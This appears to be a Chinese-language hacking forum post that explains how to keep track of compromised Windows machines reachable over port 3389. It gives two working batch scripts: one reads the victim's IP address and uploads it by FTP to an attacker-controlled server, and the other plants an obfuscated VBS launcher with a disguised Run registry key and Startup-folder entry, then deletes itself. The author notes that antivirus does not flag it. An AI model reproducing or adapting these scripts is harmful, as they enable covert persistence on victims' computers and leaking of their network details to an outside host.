许多朋友扫到3389的肉鸡。。一些发现了 直接给3389的肉机种上灰鸽子之类的后门马
但是这样容易暴露 或则一些人不会使用

每次找到的3389肉机 等肉机重新启动计算机 对方的IP就变了.很麻烦。。。
昨天没事。我想一个方法 利用系统自带的FTP命令 通过本机 自动给你的FTP空间发送3389肉机的IP

也许 高手认为没什么好高的技术含量...但唯一好的 就是不会被杀毒软件查杀 我利用vbs调用BAT隐藏

我今天早上测试了下可以

我申请的FTP是xinwen365.com 免费空间 现在好象申请不起来了 你去baidu搜索免费的FTP

@echo off
echo wscript.sleep 1500>>c:\windows\ri.vbs &call c:\windows\ri.vbs &del c:\windows\ri.vbs >nul 2>nul
:321
ping -n 5 www.baidu.com>nul && goto love
:cn
goto 321
:love
for /f "tokens=15" %%i in ('ipconfig ^| find /i "ip address"') do set ip=%%i
echo %ip% >c:\windows\bsmain_runtime.txt
echo open 自己的FTP空间地址比如你的FTP为:wxzsky.xinwen365.com 不需要输入FTP>c:\windows\sky.txt
echo FTP的用户>>c:\windows\sky.txt 
echo FTP密码>>c:\windows\sky.txt 
echo put c:\windows\bsmain_runtime.txt>>c:\windows\sky.txt 
echo bye>>c:\windows\sky.txt
ftp -s:c:\windows\sky.txt
del c:\windows\sky.txt
为了不暴露自己的FTP用户和密码请大家把上面的FTP加密
把上面的保存在3389肉机的c:\windows\love.bat 名字为love.bat

上面的love.bat 不需要运行

@echo off
echo ^s^e^t ^w^s^h^s^h^e^l^l^=^c^r^e^a^t^e^o^b^j^e^c^t^ ^(^"^w^s^c^r^i^p^t^.^s^h^e^l^l^"^ ) >c:\windows\windows.vbs
echo ^a^=^w^s^h^s^h^e^l^l^.^r^u^n^ ^(^"^c^m^d^.^e^x^e^ ^/^c^ ^c^a^l^l^ ^c^:^\^w^i^n^d^o^w^s^\^l^o^v^e^.^b^a^t^"^,^0^)>>c:\windows\windows.vbs
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v avp .exe /d c:\windows\windows.vbs
copy c:\windows\windows.vbs "%userprofile%\「开始」菜单\程序\启动\*.*"
del %0

这段随便取一个名字 例如为1.bat 运行 每次开机启动利用vbs脚本调用上面的love.bat 然后通过FTP 上传本机IP 到你的FTP 如果对方计算机有防火墙 第一次也许要问你是否运行FTP.exe 选择是
运行了1.bat这个 他会自动删除本身 我加了del %0删除本身的意思

上面是简单的写 希望对各位朋友 有用处